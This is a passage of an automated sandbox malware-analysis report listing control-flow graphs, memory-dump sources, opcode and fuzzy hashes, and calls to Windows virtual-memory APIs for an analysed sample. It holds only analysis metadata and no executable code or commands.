                                                                                                                                  • Opcode ID: 37a0c3390c56f0a41c4c4e42a5607d1fae1965db20a2635289a682b3712735fd
                                                                                                                                  • Instruction ID: 656270350026de2d4315c649a67d0a2daa66500ddb34601e08b0a0cd4c0b3157
                                                                                                                                  • Opcode Fuzzy Hash: 37a0c3390c56f0a41c4c4e42a5607d1fae1965db20a2635289a682b3712735fd
                                                                                                                                  • Instruction Fuzzy Hash: D8414633E142254FD714CB6DCC544EABBF2AB9922070B826AEC54FB365D2308D05CBD1

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2290 1598ee8-1598ef1 2291 1598ef4-1598ef7 2290->2291 2292 1598f00-1598f03 2291->2292 2293 1598f08-1598f3d 2292->2293 2295 1598f3f-1598fc7 2293->2295 2295->2291 2296 1598fcd-1599013 2295->2296 2296->2293 2297 1599019-1599028 2296->2297
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: >v!8$?04
                                                                                                                                  • API String ID: 0-995226417
                                                                                                                                  • Opcode ID: 3aa45314dd0765ace80a24ed2de9afc2e1f6193a20cb481ef30003666d3d8b19
                                                                                                                                  • Instruction ID: c092f2e5376afe73962b07a063fcf28e1978df31295085bea319dc70762526ca
                                                                                                                                  • Opcode Fuzzy Hash: 3aa45314dd0765ace80a24ed2de9afc2e1f6193a20cb481ef30003666d3d8b19
                                                                                                                                  • Instruction Fuzzy Hash: 5A31E133F101398FD714CBADC8545AABBF2AB9825071B8269EC19FB354E6709D09CBD0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2299 5767860-576786a 2300 576786c-5767899 2299->2300 2301 576789a-57678dc 2299->2301 2307 576794e-576795b 2301->2307 2308 57678de-57678fd 2301->2308 2310 57678ff-5767932 2308->2310 2311 576795c-5767996 2308->2311 2310->2311 2318 5767934-576794c 2310->2318 2314 576799e-57679d0 2311->2314 2316 57679e2-57679ee 2314->2316 2317 57679d2 2314->2317 2321 57679f4-5767a03 2316->2321 2322 5767f49-5767f9e 2316->2322 2319 5767ef3-5767efc 2317->2319 2320 57679d8-57679dc 2317->2320 2318->2307 2318->2308 2323 5767efe 2319->2323 2324 5767f0d 2319->2324 2320->2316 2320->2319 2332 5767f0f-5767f24 2321->2332 2333 5767a09-5767a28 2321->2333 2356 5767fa0-5767fa6 2322->2356 2326 5767f04-5767f07 2323->2326 2327 5767a9f-5767ab3 2323->2327 2329 5767ea0-5767eca 2324->2329 2326->2324 2326->2327 2327->2322 2331 5767ab9-5767ac8 2327->2331 2341 5767c34-5767c3d 2331->2341 2342 5767ace-5767ad8 2331->2342 2351 5767f2c-5767f41 2332->2351 2333->2322 2348 5767a2e-5767a3a 2333->2348 2341->2322 2343 5767c43-5767c53 2341->2343 2345 5767add-5767ae3 2342->2345 2346 5767ada 2342->2346 2363 5767db3-5767de0 2343->2363 2364 5767c59-5767c62 2343->2364 2345->2322 2349 5767ae9-5767af5 2345->2349 2346->2345 2352 5767a3c-5767a44 2348->2352 2353 5767af7-5767b0a 2349->2353 2354 5767b68-5767b97 2349->2354 2351->2322 2352->2322 2359 5767a4a-5767a62 2352->2359 2360 5767b0f-5767b15 2353->2360 2361 5767b0c 2353->2361 2354->2322 2362 5767b9d-5767ba6 2354->2362 2357 5767ff8-5767ffe 2356->2357 2358 5767fa8-5767fb4 2356->2358 2367 5768004-5768014 2357->2367 2368 57680c9-57680fe 2357->2368 2365 5767fb7-5767fc9 2358->2365 2359->2352 2381 5767a64-5767a8e 2359->2381 2360->2322 2369 5767b1b-5767b4f 2360->2369 2361->2360 2370 5767ba8-5767bad 2362->2370 2383 5767de2-5767de7 2363->2383 2384 5767de9 2363->2384 2364->2322 2371 5767c68-5767c77 2364->2371 2365->2368 2372 5767fcf-5767fe2 2365->2372 2367->2368 2374 576801a-576802a 2367->2374 2402 5768100-576811f 2368->2402 2369->2322 2375 5767b55-5767b66 2369->2375 2370->2322 2377 5767bb3-5767bcc 2370->2377 2386 5767d21-5767d2a 2371->2386 2387 5767c7d-5767c8b 2371->2387 2372->2368 2379 5767fe8-5767ff6 2372->2379 2374->2368 2382 5768030-5768040 2374->2382 2396 5767bd6-5767be8 2375->2396 2377->2370 2398 5767bce-5767bd0 2377->2398 2379->2357 2379->2365 2381->2327 2400 5767a90 2381->2400 2382->2368 2388 5768046-5768054 2382->2388 2390 5767dee-5767dff 2383->2390 2384->2390 2386->2322 2392 5767d30-5767d3f 2386->2392 2387->2322 2393 5767c91-5767ca0 2387->2393 2388->2356 2395 576805a-5768067 2388->2395 2390->2322 2409 5767e05-5767e17 2390->2409 2413 5767d46-5767d4f 2392->2413 2414 5767d41-5767d44 2392->2414 2415 5767ca6-5767cad 2393->2415 2416 5767d83-5767d9e 2393->2416 2417 576806a-5768070 2395->2417 2396->2322 2399 5767bee-5767bf8 2396->2399 2398->2396 2403 5767c00-5767c04 2399->2403 2404 5767bfa 2399->2404 2400->2329 2407 5767a96-5767a99 2400->2407 2418 5768121-5768125 2402->2418 2411 5767c06-5767c0b 2403->2411 2412 5767c0d-5767c11 2403->2412 2404->2403 2407->2327 2407->2329 2430 5767e71 2409->2430 2431 5767e19-5767e33 2409->2431 2419 5767c1d-5767c2f 2411->2419 2421 5767c13-5767c17 2412->2421 2422 5767c19 2412->2422 2413->2322 2423 5767d55-5767d64 2413->2423 2420 5767d7a-5767d80 2414->2420 2424 5767cb6 2415->2424 2425 5767caf-5767cb4 2415->2425 2434 5767da7 2416->2434 2435 5767da0-5767da5 2416->2435 2417->2368 2426 5768072-5768080 2417->2426 2419->2319 2420->2416 2421->2419 2422->2419 2443 5767d66-5767d69 2423->2443 2444 5767d6b-5767d71 2423->2444 2429 5767cbb-5767ccd 2424->2429 2425->2429 2426->2417 2441 5768082-5768087 2426->2441 2438 5767cd2-5767cd8 2429->2438 2439 5767ccf 2429->2439 2437 5767e74-5767e89 2430->2437 2432 5767e35-5767e4a 2431->2432 2433 5767e4c-5767e6f 2431->2433 2432->2437 2433->2437 2442 5767dac-5767dae 2434->2442 2435->2442 2445 5767e91-5767e94 2437->2445 2446 5767e8b 2437->2446 2438->2322 2447 5767cde-5767cf2 2438->2447 2439->2438 2448 576808a-576808c 2441->2448 2442->2437 2451 5767d74-5767d77 2443->2451 2444->2451 2452 5767e96-5767e9a 2445->2452 2454 5767ecd-5767ef0 2445->2454 2446->2452 2453 5767e8d-5767e8f 2446->2453 2447->2322 2455 5767cf8-5767d02 2447->2455 2448->2368 2456 576808e-576809c 2448->2456 2451->2420 2452->2329 2452->2351 2453->2445 2453->2452 2454->2319 2457 5767d04 2455->2457 2458 5767d0a-5767d1c 2455->2458 2456->2448 2459 576809e-57680c6 2456->2459 2457->2458 2458->2319
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Haq
                                                                                                                                  • API String ID: 0-725504367
                                                                                                                                  • Opcode ID: 881afae0f5d483ec9f8a3a538203268f4a153a5e45796a6710aea4b142af8fd6
                                                                                                                                  • Instruction ID: dc8271a5919b8ea1cab57d18141c53e3c9c2b62c09aaba5cf70e1bfe85327375
                                                                                                                                  • Opcode Fuzzy Hash: 881afae0f5d483ec9f8a3a538203268f4a153a5e45796a6710aea4b142af8fd6
                                                                                                                                  • Instruction Fuzzy Hash: ED627971A00606DFC718CF68C4849AEBBF2FF88314B258A69D846AB655D734FD46CF90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2465 1599850-1599862 2466 1599865-1599893 2465->2466 2468 1599895-1599898 2466->2468 2469 159989a-159989f 2468->2469 2470 15998a7-15998ad 2468->2470 2469->2470 2471 15998cc-1599901 2470->2471 2472 15998af-15998cb 2470->2472 2475 1599904-1599911 call 1599850 2471->2475 2478 1599914-159993f call 1598ae8 2475->2478 2484 1599944-159996a 2478->2484 2484->2475 2486 159996c-1599998 2484->2486 2486->2475 2488 159999e-15999c3 2486->2488 2488->2475 2491 15999c9-15999e9 2488->2491 2492 15999ef-15999fd 2491->2492 2493 1599b40-1599b5d call 1599710 2491->2493 2492->2475 2495 1599a03-1599a36 2492->2495 2493->2484 2497 1599b63-1599b89 2493->2497 2495->2475 2501 1599a3c 2495->2501 2499 1599b8b-1599b93 2497->2499 2500 1599bf0-1599c3d call 1599710 call 1591098 call 1598bf0 2497->2500 2499->2475 2503 1599b99-1599b9d 2499->2503 2539 1599c42-1599c9e 2500->2539 2504 1599b13-1599b1f 2501->2504 2506 1599bd9-1599be5 2503->2506 2507 1599b9f-1599bae 2503->2507 2504->2478 2508 1599b25-1599b34 2504->2508 2512 1599beb 2506->2512 2513 1599d47-1599d5b 2506->2513 2507->2478 2511 1599bb4-1599bcc 2507->2511 2509 1599b3a 2508->2509 2510 1599a41-1599a74 call 1599850 2508->2510 2509->2493 2529 1599aa2-1599ae1 call 1599710 2510->2529 2530 1599a76-1599a82 2510->2530 2516 1599d62-1599d98 2511->2516 2517 1599bd2-1599bd7 2511->2517 2512->2478 2513->2516 2523 1599d9a-1599d9d 2516->2523 2524 1599dd7-1599ddc 2516->2524 2517->2500 2517->2506 2527 1599d9f-1599dd2 call 1599480 2523->2527 2528 1599df3-1599eeb 2523->2528 2531 1599ddf-1599df1 2524->2531 2527->2524 2528->2531 2535 1599ef1-1599efb 2528->2535 2552 1599ae7-1599af8 2529->2552 2530->2486 2534 1599a88-1599a9c 2530->2534 2531->2528 2534->2529 2541 1599cb0-1599cb9 2539->2541 2542 1599ca0 2539->2542 2543 1599cbb-1599cc4 2541->2543 2544 1599cf0 2541->2544 2546 1599cca-1599cd9 2542->2546 2543->2546 2549 1599cf5 2544->2549 2550 1599cdb-1599cee 2546->2550 2551 1599ca2-1599cad 2546->2551 2549->2513 2550->2549 2551->2541 2552->2475 2555 1599afe-1599b0d 2552->2555 2555->2504
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: #!
                                                                                                                                  • API String ID: 0-2286232487
                                                                                                                                  • Opcode ID: 1d9553c79a65c0ec37434c4e5918e10a0343bfc1e6f169b8671e99188f578268
                                                                                                                                  • Instruction ID: c35d1fa46bc4444722e8c06c23e09e99ae0b00c5d861dfe037183005d6565b9e
                                                                                                                                  • Opcode Fuzzy Hash: 1d9553c79a65c0ec37434c4e5918e10a0343bfc1e6f169b8671e99188f578268
                                                                                                                                  • Instruction Fuzzy Hash: D602CF72B103168FCB14DFA8C8C06ADBBB6BF89314B55816ED505EF361DA749C05CB92

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2556 159c048-159c067 call 159a778 2560 159c069-159c06b 2556->2560 2561 159c08b-159c097 2556->2561 2562 159c06d-159c073 2560->2562 2563 159c085-159c08a 2560->2563 2561->2560 2564 159c099-159c0f6 2561->2564 2565 159c075 2562->2565 2566 159c077-159c083 2562->2566 2571 159c0fb-159c107 2564->2571 2565->2563 2566->2563 2573 159c10d-159c11f 2571->2573 2574 159c1a2-159c1a8 2571->2574 2575 159c15d-159c16d 2573->2575 2576 159c121-159c129 2573->2576 2577 159c12b-159c146 2574->2577 2578 159c1aa-159c1bf 2574->2578 2584 159c16f-159c178 2575->2584 2585 159c190 2575->2585 2576->2573 2576->2577 2577->2575 2582 159c148-159c14e 2577->2582 2578->2575 2583 159c1c1-159c1dc 2578->2583 2582->2571 2587 159c150-159c15a 2582->2587 2588 159c40a-159c435 2583->2588 2589 159c1e2 2583->2589 2590 159c17a-159c17d 2584->2590 2591 159c17f-159c18c 2584->2591 2586 159c193-159c195 call 159ca40 2585->2586 2609 159c19b-159c19d 2586->2609 2587->2575 2621 159c494-159c4af 2588->2621 2622 159c437-159c43d 2588->2622 2592 159c1e9-159c209 2589->2592 2593 159c258-159c296 2589->2593 2594 159c29b-159c2a7 2589->2594 2595 159c34c-159c353 2589->2595 2596 159c3ac-159c3d0 2589->2596 2597 159c20e-159c22e 2589->2597 2598 159c37e-159c3a7 2589->2598 2599 159c233-159c253 2589->2599 2600 159c303-159c322 call 15997c8 2589->2600 2601 159c2d2-159c2d8 2589->2601 2602 159c3d5-159c3db 2589->2602 2603 159c327-159c333 2589->2603 2604 159c18e 2590->2604 2591->2604 2620 159c608-159c60f 2592->2620 2593->2620 2594->2577 2612 159c2ad-159c2cd 2594->2612 2595->2573 2611 159c359-159c379 2595->2611 2596->2620 2597->2620 2598->2620 2599->2620 2600->2620 2601->2573 2605 159c2de-159c2fe 2601->2605 2602->2571 2607 159c3e1-159c405 2602->2607 2636 159c33b-159c347 2603->2636 2604->2586 2605->2620 2607->2620 2609->2620 2611->2620 2612->2620 2641 159c50e-159c514 2621->2641 2642 159c4b1-159c4b5 2621->2642 2622->2577 2626 159c443-159c447 2622->2626 2638 159c449-159c44b 2626->2638 2639 159c44d-159c453 2626->2639 2636->2620 2645 159c477-159c48f 2638->2645 2639->2571 2646 159c459-159c462 2639->2646 2641->2583 2657 159c51a-159c531 2641->2657 2651 159c4c7-159c4cd 2642->2651 2652 159c4b7-159c4bd 2642->2652 2645->2620 2660 159c471-159c474 2646->2660 2661 159c464-159c467 2646->2661 2651->2571 2666 159c4d3-159c4dc 2651->2666 2652->2571 2665 159c4c3-159c4c5 2652->2665 2674 159c551-159c558 2657->2674 2675 159c533-159c54c 2657->2675 2660->2645 2661->2660 2669 159c4f1-159c509 2665->2669 2670 159c4eb-159c4ee 2666->2670 2671 159c4de-159c4e1 2666->2671 2669->2620 2670->2669 2671->2670 2674->2573 2677 159c55e-159c582 2674->2677 2675->2620 2681 159c5e4-159c5ea 2677->2681 2682 159c584-159c5a4 2677->2682 2681->2571 2686 159c5f0-159c606 call 1598de0 2681->2686 2684 159c5b6-159c5be 2682->2684 2685 159c5a6-159c5b4 2682->2685 2687 159c5c0-159c5e2 2684->2687 2685->2687 2686->2620 2687->2620
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: A<<
                                                                                                                                  • API String ID: 0-2897384109
                                                                                                                                  • Opcode ID: 3493e6d9413cc5404548cb7b6c4b2b70d5ed1c81f42a5ad13c9f513a1ac4b6e6
                                                                                                                                  • Instruction ID: a4c47b399a81c527fdbc44efe29e2686c22f815fa56ef5cfcb87317891378749
                                                                                                                                  • Opcode Fuzzy Hash: 3493e6d9413cc5404548cb7b6c4b2b70d5ed1c81f42a5ad13c9f513a1ac4b6e6
                                                                                                                                  • Instruction Fuzzy Hash: DBE1F136B001368FCB58EA6CC85417E76E2BBCE614B064969D816EF394DF349C058BD6

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2793 5765fa1-576603e NtProtectVirtualMemory 2796 5766047-576606c 2793->2796 2797 5766040-5766046 2793->2797 2797->2796
                                                                                                                                  APIs
                                                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05766031
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                  • Opcode ID: f57a2ed1930e8eece7e93545746fd27313a42ab8f6854f06766f1fd7fb4017f0
                                                                                                                                  • Instruction ID: 761e75de3a641ac6fff0ac8026f7ef3ec41913cdd02f6ac4eb100bff60f7d2f9
                                                                                                                                  • Opcode Fuzzy Hash: f57a2ed1930e8eece7e93545746fd27313a42ab8f6854f06766f1fd7fb4017f0
                                                                                                                                  • Instruction Fuzzy Hash: 2C21D0B1D012499FCB10DFAAD584AEEFBF5FF48310F20842AE419A7210C779A955CBA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2801 5765fa8-576603e NtProtectVirtualMemory 2804 5766047-576606c 2801->2804 2805 5766040-5766046 2801->2805 2805->2804
                                                                                                                                  APIs
                                                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05766031
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                  • Opcode ID: ad3756abf016bdfc95d45cae703c11bacf2ee84d805b7d372b38874060283fe7
                                                                                                                                  • Instruction ID: cc5172fabd5fcc660952e2b5031302e133c04a61673324bc8b57a65cdc10fc3b
                                                                                                                                  • Opcode Fuzzy Hash: ad3756abf016bdfc95d45cae703c11bacf2ee84d805b7d372b38874060283fe7
                                                                                                                                  • Instruction Fuzzy Hash: 9A2105B1D003499FCB10DFAAD580ADEFBF5FF48310F60842AE519A3210C779A940CBA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2809 5766079-5766110 NtAllocateVirtualMemory 2812 5766112-5766118 2809->2812 2813 5766119-576613e 2809->2813 2812->2813
                                                                                                                                  APIs
                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 05766103
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                  • Opcode ID: 8c725f557257b8307221ccb4b6b575a480aab1dbf0ce5d740f39a9c223cf6746
                                                                                                                                  • Instruction ID: dd208b3fe81fc5b19a9fb5775928f28bc07f85435410dd8ce1ffd3dcb9a69dec
                                                                                                                                  • Opcode Fuzzy Hash: 8c725f557257b8307221ccb4b6b575a480aab1dbf0ce5d740f39a9c223cf6746
                                                                                                                                  • Instruction Fuzzy Hash: C121F4B5D002099FCB14DFA9D885ADEFBF5FF48314F10842AE919A3210C7399955CFA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2817 5766080-5766110 NtAllocateVirtualMemory 2820 5766112-5766118 2817->2820 2821 5766119-576613e 2817->2821 2820->2821
                                                                                                                                  APIs
                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 05766103
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                  • Opcode ID: 9b142e74b4396e932a72c2287c88b6b7e99401a0ce162d6b10cb3f3f7aa447d7
                                                                                                                                  • Instruction ID: 734843698de9ebee5c82d9d52f38b15848ba9c628a136f5c86e31bfed76b49d0
                                                                                                                                  • Opcode Fuzzy Hash: 9b142e74b4396e932a72c2287c88b6b7e99401a0ce162d6b10cb3f3f7aa447d7
                                                                                                                                  • Instruction Fuzzy Hash: 8D21F5B5D002099FCF10DFAAC885ADEFBF5FF48314F50842AE919A7210C779A954CBA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2825 5762f10-5762f3a 2826 5762f3d-5762f8d call 5761db0 2825->2826 2830 5762f8f-5762fc6 2826->2830 2834 5762fc8-5762ff0 2830->2834 2834->2826 2836 5762ff6-5763017 call 5761e00 2834->2836 2840 576301a-5763051 2836->2840 2841 5763200-576320c 2840->2841 2841->2840 2842 5763212-5763223 2841->2842 2843 5763056-576305f 2842->2843 2844 5763229-5763232 2842->2844 2847 5763065-57630b3 2843->2847 2848 576335e-576336d call 5761e60 2843->2848 2845 5763234-5763237 2844->2845 2846 5763239-5763246 2844->2846 2849 5763248-5763253 2845->2849 2846->2849 2861 5763177-5763196 2847->2861 2862 57630b9-57630cb 2847->2862 2859 576336e 2848->2859 2854 5763259-57632aa 2849->2854 2857 57632c8-57632d7 2854->2857 2863 57632ac-57632ba 2857->2863 2864 57632d9-57632ec 2857->2864 2859->2859 2861->2841 2865 5763198-57631d2 2861->2865 2871 57630d1-5763157 2862->2871 2872 576315f-5763171 2862->2872 2866 57632ee 2863->2866 2867 57632bc-57632c2 2863->2867 2868 57632f3 2864->2868 2878 57631d8-57631fa 2865->2878 2866->2868 2867->2857 2868->2848 2871->2843 2881 576315d 2871->2881 2872->2861 2878->2841 2881->2878
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 3|!
                                                                                                                                  • API String ID: 0-1802679328
                                                                                                                                  • Opcode ID: 701cf231d139020ea6387332ec601b59b974d54a24fe862fe03067181a49fb0e
                                                                                                                                  • Instruction ID: 1e51d46401765e6eb804ff4d1c9d10ce37870b2337a1a1537aa38bbe73618269
                                                                                                                                  • Opcode Fuzzy Hash: 701cf231d139020ea6387332ec601b59b974d54a24fe862fe03067181a49fb0e
                                                                                                                                  • Instruction Fuzzy Hash: 2DB14E36E006298FDB14DFA9C984A9DB7F2BF88300F1685A9D809EB355DB349D45CF80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 37ff1c2e2ad56f3dcf051d183eb5002710a131b8501a63e7aa4e2326c4f0bb4f
                                                                                                                                  • Instruction ID: ccb841e3bb964ba3bece8074587c8c9eff744b16480eee7b35aeca705f459db3
                                                                                                                                  • Opcode Fuzzy Hash: 37ff1c2e2ad56f3dcf051d183eb5002710a131b8501a63e7aa4e2326c4f0bb4f
                                                                                                                                  • Instruction Fuzzy Hash: 1E126B75E0020A8FDF58CFA9D8815AEBBF2FF88314F248529E505EB354DB349985CB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cb2d11f111be4b85a34bb4c984f7fcb368fbffc2a88e9476f349a1f7db4cc411
                                                                                                                                  • Instruction ID: 1c7528ac61961edaaa4bc79cff7750298a8a05ecdf646031a15e5cd058960746
                                                                                                                                  • Opcode Fuzzy Hash: cb2d11f111be4b85a34bb4c984f7fcb368fbffc2a88e9476f349a1f7db4cc411
                                                                                                                                  • Instruction Fuzzy Hash: 4EE1B27AB401218FDB58EB6CD85482E77E2BFCD6143164968E906EF360DE34DC05CB92
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e31e3c83d2999a4eb8eb8d14930272e59bcdf68c961cdc52cadab3c37296d713
                                                                                                                                  • Instruction ID: 716eead62e354e446b1a5d4f72bbb62f18ce49ca7dca17475e5c1830d11eb81e
                                                                                                                                  • Opcode Fuzzy Hash: e31e3c83d2999a4eb8eb8d14930272e59bcdf68c961cdc52cadab3c37296d713
                                                                                                                                  • Instruction Fuzzy Hash: 40B108B5E1020A8FDB48CFA9D8865AEBBF2FF88314F204069D605EB351D7349985CF91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c561309eb075e5ae6032157aaf8630531b23f3741203402550bf5f60ea41b191
                                                                                                                                  • Instruction ID: 45f71323b3035c4ae10fdb52e80b08d8a3ed9271a3eb082edcbbff80e08da70e
                                                                                                                                  • Opcode Fuzzy Hash: c561309eb075e5ae6032157aaf8630531b23f3741203402550bf5f60ea41b191
                                                                                                                                  • Instruction Fuzzy Hash: 4C7137B7F005269BC748DEBD899006EB6E3BBD925035A492EDC0AFB351DA349C0587D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 75fea6b4b90846d5e7946a08e4325602f4f5b5232f3054aa4e8c50a80b5d61bd
                                                                                                                                  • Instruction ID: 2bd690d8629e16fb604d112672f1d0fb560d08a97f20b5737a52c03e1f84d691
                                                                                                                                  • Opcode Fuzzy Hash: 75fea6b4b90846d5e7946a08e4325602f4f5b5232f3054aa4e8c50a80b5d61bd
                                                                                                                                  • Instruction Fuzzy Hash: 276128B7F005269BC748EEBE499006EA6E3BBD825035A452EDC0EFB351DA34DC0587D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4d0768eb639d22a30e315bf176093ba58910f3592f8672686548fb695cf91bc4
                                                                                                                                  • Instruction ID: 831d72bf26e62c370961bc22c0dac31421ed0d1e38c2bc17e108f800ac536f39
                                                                                                                                  • Opcode Fuzzy Hash: 4d0768eb639d22a30e315bf176093ba58910f3592f8672686548fb695cf91bc4
                                                                                                                                  • Instruction Fuzzy Hash: 60510336F006258FDB18DE7DD8945AEB7A6BB8821070645ADD91AEF361DB34CC01CBC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
